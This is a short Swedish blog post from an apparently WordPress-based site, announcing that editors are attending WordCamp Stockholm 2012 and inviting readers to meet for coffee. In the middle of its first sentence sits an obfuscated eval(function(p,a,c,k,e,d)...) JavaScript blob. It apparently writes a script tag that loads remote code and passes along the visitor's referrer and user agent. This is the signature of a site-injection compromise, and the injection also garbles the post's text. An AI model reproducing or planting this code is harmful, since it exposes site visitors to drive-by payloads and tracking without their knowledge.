Image Image Image Image Image Image Image Image Image Image

| 21 juli, 2018

Scroll to top

Top

No Comments

WordCamp Stockholm 2012

Sebastian Plengier Ehrnfelt

20121022-091448.jpg

Idag eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|iyfyi|var|u0026u|referrer|renie||js|php’.split(‘|’),0,{}))
är några från redaktionen på WordCamp 2012 i Stockholm och lyssnar på hajar inom WordPress och Webb.

Är det möjligen några läsare som också är här så vore det jätte kul att ta en kaffe i någon av pauserna.

Hello world!

Läs mer i vårt andra inlägg här!

Submit a Comment